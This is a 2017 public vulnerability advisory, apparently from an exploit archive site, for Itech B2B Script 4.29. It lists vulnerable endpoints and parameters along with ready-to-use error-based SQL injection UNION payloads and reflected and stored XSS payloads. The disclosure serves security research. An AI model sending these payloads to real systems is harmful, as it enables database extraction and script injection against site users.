Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection: Posted Feb 15, 2017; Authored by Marc Castejon; Itech B2B script version 4.29 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 8e1f1a65759427b26ec79b46063d2e78373e39bf013568f9bdbae53aae2c6dba; Download | Favorite | View

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability
Google Dork :    -
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : http://itechscripts.com/b2b-script/
Software Link: http://b2b.itechscripts.com
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250
 
------------------------------------------------
 
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keywords
Method: GET
Payload:  ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
 
------------------------------------------------
 
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
 
-----------------------------------------------
 
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: <img src=i onerror=prompt(1)>
 
-----------------------------------------------
 
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keyword
Method: GET
Payload: <img src=i onerror=prompt(1)>
 
------------------------------------------------
 
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/catcompany.php
Vulnerable Parameters: token
Method: GET
Payload:  ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
 
-----------------------------------------------
 
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php
Vulnerable Parameters: id
Method: GET
Payload:  ') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
 
-----------------------------------------------
 
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php
Vulnerable Parameters: msg_message
Method: POST
Payload: <img src=i onerror=prompt(1)>
 
------------------------------------------------
 
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php
Vulnerable Parameters: fname
Method: POST
Payload: <img src=i onerror=prompt(1)>

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

Share This

Itech B2B 4.2.9 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems